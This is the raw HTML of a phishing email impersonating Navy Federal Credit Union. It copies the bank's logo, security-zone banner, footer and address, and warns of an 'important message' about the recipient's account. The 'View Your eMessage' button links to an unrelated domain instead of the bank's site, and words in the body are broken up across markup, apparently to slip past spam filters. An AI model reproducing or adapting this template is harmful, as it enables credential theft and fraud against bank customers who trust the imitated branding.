<table align="center" bgcolor="#ffffff" border="0" cellpadding="0" cellspacing="0" role="presentation" width="98%" style="-webkit-font-smoothing: antialiased; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-variant-numeric: inherit; font-variant-east-asian: inherit; font-weight: 400; font-stretch: inherit; font-size: 15px; line-height: inherit; font-family: &quot;Segoe UI&quot;, &quot;Segoe UI Web (West European)&quot;, &quot;Segoe UI&quot;, -apple-system, BlinkMacSystemFont, Roboto, &quot;Helvetica Neue&quot;, sans-serif; border-collapse: collapse !important; color: rgb(32, 31, 30); letter-spacing: normal; orphans: 2; text-align: start; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;">
	<tbody style="-webkit-font-smoothing: antialiased;">
		<tr style="-webkit-font-smoothing: antialiased;">
			<td align="center" bgcolor="#003366" valign="top" width="100%" style="-webkit-font-smoothing: antialiased; white-space: normal !important; background-color: rgb(0, 51, 102);">
			<table align="center" border="0" cellpadding="0" cellspacing="0" width="100%" style="-webkit-font-smoothing: antialiased; font: inherit; border-collapse: collapse !important;">
				<tbody style="-webkit-font-smoothing: antialiased;">
					<tr style="-webkit-font-smoothing: antialiased;">
						<td align="center" valign="top" style="-webkit-font-smoothing: antialiased; white-space: normal !important;">
						<table align="center" border="0" cellpadding="0" cellspacing="0" role="presentation" width="100%" style="-webkit-font-smoothing: antialiased; font: inherit; border-collapse: collapse !important;">
							<tbody style="-webkit-font-smoothing: antialiased;">
								<tr style="-webkit-font-smoothing: antialiased;">
									<td align="center" valign="top" style="-webkit-font-smoothing: antialiased; white-space: normal !important; font-family: &quot;Helvetica Neue&quot;, Helvetica, Arial, sans-serif; padding: 15px 10px;">
									<a target="_blank" rel="noopener noreferrer" data-auth="NotApplicable" data-linkindex="0" style="-webkit-font-smoothing: antialiased; margin: 0px; padding: 0px; border: 0px; font-style: inherit; font-variant: inherit; font-weight: 600; font-stretch: inherit; font-size: inherit; line-height: inherit; font-family: inherit; vertical-align: baseline; text-decoration: none; color: rgb(255, 255, 255);" href="https://nfcu.link/XgpTdIrkr/400a8b51-671a-492c-9584-d7e2f5ffc871">
									<img data-imagetype="External" src="blob:https://outlook.live.com/6b061ca9-07ce-48ea-b11c-aa710068fa69" originalsrc="http://media.nfcu.org/navyfederal/logos/nfcu-logo-horizontal-white.png" data-connectorsauthtoken="1" data-imageproxyendpoint="/actions/ei" data-imageproxyid alt="NAVY FEDERAL CREDIT UNION" border="0" height="15" width="260" style="-webkit-font-smoothing: antialiased; margin: 0px auto; padding: 0px; border: 0px; font-style: inherit; font-variant: inherit; font-weight: 600; font-stretch: inherit; font-size: 16px; line-height: 24px; font-family: inherit; vertical-align: baseline; color: rgb(255, 255, 255); height: auto; outline: none; text-decoration: none; display: block;"></a></td>
								</tr>
						</table>
						</td>
					</tr>
			</table>
			</td>
		</tr>
		<tr id="x_security-zone--editable" style="-webkit-font-smoothing: antialiased;">
			<td align="center" bgcolor="#f1f6fa" valign="top" width="100%" style="-webkit-font-smoothing: antialiased; white-space: normal !important; background-color: rgb(241, 246, 250);">
			<table align="center" border="0" cellpadding="0" cellspacing="0" width="100%" style="-webkit-font-smoothing: antialiased; font: inherit; border-collapse: collapse !important;">
				<tbody style="-webkit-font-smoothing: antialiased;">
					<tr style="-webkit-font-smoothing: antialiased;">
						<td align="center" valign="top" style="-webkit-font-smoothing: antialiased; white-space: normal !important;">
						<table align="center" border="0" cellpadding="0" cellspacing="0" role="presentation" width="100%" style="-webkit-font-smoothing: antialiased; font: inherit; border-collapse: collapse !important;">
							<tbody style="-webkit-font-smoothing: antialiased;">
								<tr style="-webkit-font-smoothing: antialiased;">
									<td align="center" valign="top" style="-webkit-font-smoothing: antialiased; white-space: nowrap; padding: 5px 10px;">
									<p class="x_em_secZone" id="x_security-zone--editable" style="-webkit-font-smoothing: antialiased; font-size: 11px; text-decoration: none; font-family: &quot;Helvetica Neue&quot;, Helvetica, Arial, sans-serif; font-weight: 300; color: rgb(56, 58, 58); margin: 0px; display: block; line-height: 16px;">
									<span style="-webkit-font-smoothing: antialiased; margin: 0px; padding: 0px; border: 0px; font-style: inherit; font-variant: inherit; font-weight: 600; font-stretch: inherit; font-size: inherit; line-height: inherit; font-family: inherit; vertical-align: baseline; color: rgb(0, 51, 102);">
									<span data-markjs="true" class="markce1bd373g" data-ogac data-ogab data-ogsc data-ogsb style="-webkit-font-smoothing: antialiased; margin: 0px; padding: 0px; border: 0px; font: inherit; vertical-align: baseline; color: inherit;">
									Navy</span>&nbsp;Federal Security Zone:</span><br style="-webkit-font-smoothing: antialiased;">
									&nbsp; &nbsp; Email for &nbsp; | &nbsp; Access&nbsp;XXXXXXXXXXXXXX</td>
								</tr>
						</table>
						</td>
					</tr>
			</table>
			</td>
		</tr>
		<tr style="-webkit-font-smoothing: antialiased;">
			<td align="center" bgcolor="#ffffff" valign="top" width="100%" style="-webkit-font-smoothing: antialiased; white-space: normal !important;">
			<table align="center" border="0" cellpadding="0" cellspacing="0" width="600" style="-webkit-font-smoothing: antialiased; font: inherit; border-collapse: collapse !important;">
				<tbody style="-webkit-font-smoothing: antialiased;">
					<tr style="-webkit-font-smoothing: antialiased;">
						<td align="center" valign="top" width="600" style="-webkit-font-smoothing: antialiased; white-space: normal !important;">
						<table align="center" border="0" cellpadding="0" cellspacing="0" class="x_container" role="presentation" width="100%" style="-webkit-font-smoothing: antialiased; font: inherit; border-collapse: collapse !important; width: 600px !important; max-width: 600px;">
							<tbody style="-webkit-font-smoothing: antialiased;">
								<tr style="-webkit-font-smoothing: antialiased;">
									<td align="center" valign="top" style="-webkit-font-smoothing: antialiased; white-space: normal !important; font-size: 0px; padding: 30px 0px;">
									<table align="center" border="0" cellpadding="0" cellspacing="0" width="600" style="-webkit-font-smoothing: antialiased; font: inherit; border-collapse: collapse !important;">
										<tbody style="-webkit-font-smoothing: antialiased;">
											<tr style="-webkit-font-smoothing: antialiased;">
												<td align="left" valign="top" width="600" style="-webkit-font-smoothing: antialiased; white-space: normal !important;">
												<div class="x_em_100p" style="-webkit-font-smoothing: antialiased; margin: 0px; padding: 0px; border: 0px; font: inherit; vertical-align: top; color: inherit; width: 600px; display: inline-block;">
													<table border="0" cellpadding="0" cellspacing="0" role="presentation" width="100%" style="-webkit-font-smoothing: antialiased; font: inherit; border-collapse: collapse !important;">
														<tbody style="-webkit-font-smoothing: antialiased;">
															<tr style="-webkit-font-smoothing: antialiased;">
																<td valign="top" style="-webkit-font-smoothing: antialiased; white-space: normal !important; font-size: 0px; padding: 0px 10px;">
																<table align="center" border="0" cellpadding="0" cellspacing="0" role="presentation" width="100%" style="-webkit-font-smoothing: antialiased; font: inherit; border-collapse: collapse !important;">
																	<tbody style="-webkit-font-smoothing: antialiased;">
																		<tr style="-webkit-font-smoothing: antialiased;">
																			<td align="left" id="x_main-content--editable" style="-webkit-font-smoothing: antialiased; white-space: normal !important; font-size: 16px; padding: 0px;">
																			<h1 class="x_em_hdrResize" style="-webkit-font-smoothing: antialiased; font-size: 32px; text-decoration: none; font-family: &quot;Helvetica Neue&quot;, Helvetica, Arial, sans-serif; font-weight: 600; color: rgb(0, 51, 102); padding-bottom: 10px; margin: 0px; display: block; line-height: 40px;">
																			Message 
																			Notification</h1>
																			<p style="-webkit-font-smoothing: antialiased; font-size: 16px; margin-bottom: 0px; font-family: &quot;Helvetica Neue&quot;, Helvetica, Arial, sans-serif; margin-top: 0px; font-weight: 300; color: rgb(12, 13, 14); padding-bottom: 0px; padding-top: 10px; line-height: 24px;">
																			We've 
																			sent 
																			you 
																			an 
																			important
																			<b>
																			messa</b>ge 
																			about 
																			your 
																			account. 
																			You 
																			can 
																			view 
																			it 
																			online 
																			or 
																			through 
																			the
																			<b>
																			mobile 
																			app</b> 
																			or 
																			by
																			<b>
																			signing</b> 
																			in 
																			at&nbsp;<b style="-webkit-font-smoothing: antialiased;"><span style="-webkit-font-smoothing: antialiased; font-style: inherit; font-variant: inherit; font-weight: 700; font-stretch: inherit; font-size: inherit; line-height: inherit; font-family: inherit; vertical-align: baseline; color: #0000FF; text-decoration: none; border: 0px none; margin: 0px; padding: 0px">navyfederal.org</span></b>. 
																			If 
																			you 
																			don't 
																			have 
																			the 
																			mobile 
																			app, 
																			please 
																			click 
																			below 
																			to 
																			sign 
																			into 
																			Online&nbsp;<span class="x_markf395q12lo" style="-webkit-font-smoothing: antialiased; margin: 0px; padding: 0px; border: 0px; font: inherit; vertical-align: baseline; color: inherit;">Bank</span>ing 
																			to 
																			view 
																			your 
																			important 
																			message.</p>
																			<table role="presentation" width="100%" cellspacing="0" cellpadding="0" border="0" align="center" style="-webkit-font-smoothing: antialiased; font: inherit;">
																				<tbody style="-webkit-font-smoothing: antialiased;">
																					<tr style="-webkit-font-smoothing: antialiased;">
																						<td id="x_x_main-content--editable" align="left" style="-webkit-font-smoothing: antialiased; white-space: normal !important; font-size: 0px; padding: 0px;">&nbsp;<table role="presentation" width="100%" cellspacing="0" cellpadding="0" border="0" height="25">
														<tr>
															<td align="center">
															<table class="x_em_center" role="presentation" style="border-collapse:separate!important" width="211" cellspacing="0" cellpadding="0" border="0">
																<tr>
																	<td style="font-family:Open Sans,Helvetica,Arial,sans-serif; border-radius:4px; color:#ffffff" bgcolor="#ed780f" align="center">
																	<font face="Arial">
																	<a href="https://ontooperadropetede.com/trackbalk/capital/shores/etc/orodor/condor/">
																	<span style="color: #FFFFFF; font-weight: 700; font-size: 19px; text-decoration: none; background-color: #ED780F">
																	View Your 
																	eMessage</span></a></font> 
																	</td>
																</tr>
															</table>
															</td>
														</tr>
													</table>
																						</td>
																					</tr>
																			</table>
																			</td>
																		</tr>
																</table>
																</td>
															</tr>
													</table>
												</div>
												</td>
											</tr>
									</table>
									</td>
								</tr>
						</table>
						</td>
					</tr>
			</table>
			</td>
		</tr>
		<tr style="-webkit-font-smoothing: antialiased;">
			<td align="center" bgcolor="#f4f3f1" valign="top" width="100%" style="-webkit-font-smoothing: antialiased; white-space: normal !important;">
			<table align="center" border="0" cellpadding="0" cellspacing="0" width="600" style="-webkit-font-smoothing: antialiased; font: inherit; border-collapse: collapse !important;">
				<tbody style="-webkit-font-smoothing: antialiased;">
					<tr style="-webkit-font-smoothing: antialiased;">
						<td align="center" valign="top" width="600" style="-webkit-font-smoothing: antialiased; white-space: normal !important;">
						<table align="center" border="0" cellpadding="0" cellspacing="0" class="x_container" role="presentation" width="100%" style="-webkit-font-smoothing: antialiased; font: inherit; border-collapse: collapse !important; width: 600px !important; max-width: 600px;">
							<tbody style="-webkit-font-smoothing: antialiased;">
								<tr style="-webkit-font-smoothing: antialiased;">
									<td align="center" valign="middle" style="-webkit-font-smoothing: antialiased; white-space: normal !important; font-size: 0px; padding: 10px 0px;">
									<table align="center" border="0" cellpadding="0" cellspacing="0" width="600" style="-webkit-font-smoothing: antialiased; font: inherit; border-collapse: collapse !important;">
										<tbody style="-webkit-font-smoothing: antialiased;">
											<tr style="-webkit-font-smoothing: antialiased;">
												<td align="left" valign="top" width="600" style="-webkit-font-smoothing: antialiased; white-space: normal !important;">
												<div class="x_em_100p" style="-webkit-font-smoothing: antialiased; margin: 0px; padding: 0px; border: 0px; font: inherit; vertical-align: middle; color: inherit; width: 600px; display: inline-block;">
													<table border="0" cellpadding="0" cellspacing="0" role="presentation" width="100%" style="-webkit-font-smoothing: antialiased; font: inherit; border-collapse: collapse !important;">
														<tbody style="-webkit-font-smoothing: antialiased;">
															<tr style="-webkit-font-smoothing: antialiased;">
																<td align="center" style="-webkit-font-smoothing: antialiased; white-space: normal !important; font-size: 0px; padding: 0px 10px;">
																<p class="x_em_center" style="-webkit-font-smoothing: antialiased; font-size: 16px; text-decoration: none; font-family: &quot;Helvetica Neue&quot;, Helvetica, Arial, sans-serif; font-weight: 600; color: rgb(0, 51, 102); margin: 0px; display: block; line-height: 24px;">
																|
																Our Members Are 
																the Mission<sup style="-webkit-font-smoothing: antialiased; font-size: 7.2px; line-height: 0;">®</sup></td>
															</tr>
													</table>
												</div>
												</td>
											</tr>
									</table>
									</td>
								</tr>
						</table>
						</td>
					</tr>
			</table>
			</td>
		</tr>
		<tr style="-webkit-font-smoothing: antialiased;">
			<td align="center" bgcolor="#eceae7" valign="top" width="100%" style="-webkit-font-smoothing: antialiased; white-space: normal !important; border-top: 1px solid rgb(207, 204, 201);">
			<table align="center" border="0" cellpadding="0" cellspacing="0" width="600" style="-webkit-font-smoothing: antialiased; font: inherit; border-collapse: collapse !important;">
				<tbody style="-webkit-font-smoothing: antialiased;">
					<tr style="-webkit-font-smoothing: antialiased;">
						<td align="center" valign="top" width="600" style="-webkit-font-smoothing: antialiased; white-space: normal !important;">
						<table align="center" border="0" cellpadding="0" cellspacing="0" class="x_container" role="presentation" width="100%" style="-webkit-font-smoothing: antialiased; font: inherit; border-collapse: collapse !important; width: 600px !important; max-width: 600px;">
							<tbody style="-webkit-font-smoothing: antialiased;">
								<tr style="-webkit-font-smoothing: antialiased;">
									<td align="left" valign="top" style="-webkit-font-smoothing: antialiased; white-space: normal !important; font-size: 0px; padding: 30px 10px;">
									<p style="-webkit-font-smoothing: antialiased; font-size: 12px; text-decoration: none; font-family: &quot;Helvetica Neue&quot;, Helvetica, Arial, sans-serif; font-weight: 300; color: rgb(104, 105, 106); margin: 0px 0px 5px; display: block; line-height: 20px;">
									<span class="x_noBreak" style="-webkit-font-smoothing: antialiased; margin: 0px; padding: 0px; border: 0px; font: inherit; vertical-align: baseline; color: inherit; white-space: nowrap !important;">
									|
									Contact Us</span>&nbsp;&nbsp;|&nbsp;&nbsp;Security&nbsp;&nbsp;|&nbsp;&nbsp;Mobile 
									Banking&nbsp;&nbsp;|&nbsp;&nbsp;Privacy&nbsp;Policy</p>
									<p style="-webkit-font-smoothing: antialiased; font-size: 12px; text-decoration: none; font-family: &quot;Helvetica Neue&quot;, Helvetica, Arial, sans-serif; font-weight: 400; color: rgb(104, 105, 106); margin: 0px 0px 5px; display: block; line-height: 20px;">
									Please do not reply to this email. This 
									email is being sent from:&nbsp;<span data-markjs="true" class="markce1bd373g" data-ogac data-ogab data-ogsc data-ogsb style="-webkit-font-smoothing: antialiased; margin: 0px; padding: 0px; border: 0px; font: inherit; vertical-align: baseline; color: inherit;">Navy</span>&nbsp;Federal 
									Credit Union,&nbsp;<span class="x_addressLink" style="-webkit-font-smoothing: antialiased; margin: 0px; padding: 0px; border: 0px; font: inherit; vertical-align: baseline; color: inherit;">P.O. 
									Box 3000, Merrifield, VA 22119-3000</span>.</p>
									<p style="-webkit-font-smoothing: antialiased; font-size: 12px; text-decoration: none; font-family: &quot;Helvetica Neue&quot;, Helvetica, Arial, sans-serif; font-weight: 400; color: rgb(104, 105, 106); margin: 0px 0px 5px; display: block; line-height: 20px;">
									<span class="x_noBreak" style="-webkit-font-smoothing: antialiased; margin: 0px; padding: 0px; border: 0px; font: inherit; vertical-align: baseline; color: inherit; white-space: nowrap !important;">
									©&nbsp;<span id="x_copyright-year--editable" style="-webkit-font-smoothing: antialiased; margin: 0px; padding: 0px; border: 0px; font: inherit; vertical-align: baseline; color: inherit;">2022</span></span>&nbsp;<span data-markjs="true" class="markce1bd373g" data-ogac data-ogab data-ogsc data-ogsb style="-webkit-font-smoothing: antialiased; margin: 0px; padding: 0px; border: 0px; font: inherit; vertical-align: baseline; color: inherit;">Navy</span>&nbsp;Federal 
									Credit Union. All rights reserved.</p>
									<p style="-webkit-font-smoothing: antialiased; font-size: 16px; text-decoration: none; font-family: &quot;Helvetica Neue&quot;, Helvetica, Arial, sans-serif; font-weight: 600; color: rgb(104, 105, 106); margin: 0px; display: block; line-height: 20px;">
									Federally insured by NCUA.</p>
									<div style="-webkit-font-smoothing: antialiased; margin: 30px 0px; padding: 0px; border: 0px; font: inherit; vertical-align: baseline; color: inherit;">
										<p style="-webkit-font-smoothing: antialiased; font-size: 1px; border-top: 1px solid rgb(207, 204, 201); height: 1px; line-height: 1px;">&nbsp;</div>
									<div id="x_subfooter--editable" style="-webkit-font-smoothing: antialiased; margin: 0px; padding: 0px; border: 0px; font: inherit; vertical-align: baseline; color: inherit;">
										<p style="-webkit-font-smoothing: antialiased; font-size: 12px; margin-bottom: 0px; font-family: &quot;Helvetica Neue&quot;, Helvetica, Arial, sans-serif; margin-top: 0px; font-weight: 400; color: rgb(56, 58, 58); padding-bottom: 10px; padding-top: 0px; line-height: 20px;">
										*Message and data rates may apply.&nbsp;Terms 
										and Conditions&nbsp;are available.</div>
									</td>
								</tr>
						</table>
						</td>
					</tr>
			</table>
			</td>
		</tr>
</table>
<div style="-webkit-font-smoothing: antialiased; margin: 0px; padding: 0px; border: 0px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-variant-numeric: inherit; font-variant-east-asian: inherit; font-weight: 400; font-stretch: inherit; font-size: 15px; line-height: inherit; font-family: &quot;Segoe UI&quot;, &quot;Segoe UI Web (West European)&quot;, &quot;Segoe UI&quot;, -apple-system, BlinkMacSystemFont, Roboto, &quot;Helvetica Neue&quot;, sans-serif; vertical-align: baseline; color: rgb(32, 31, 30); letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(255, 255, 255); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;">
	<img data-imagetype="External" src="https://notify.egain.cloud/egain/notify/v1/readNotify?notifyMsgId=400a8b51-671a-492c-9584-d7e2f5ffc871&tenantId=39&status=read" width="1" height="1" alt="" style="-webkit-font-smoothing: antialiased; margin: 0px; padding: 0px; border: 0px; font-style: inherit; font-variant: inherit; font-weight: inherit; font-stretch: inherit; font-size: inherit; line-height: 15px; font-family: inherit; vertical-align: baseline; color: inherit; height: auto; outline: none; text-decoration: none;"></div>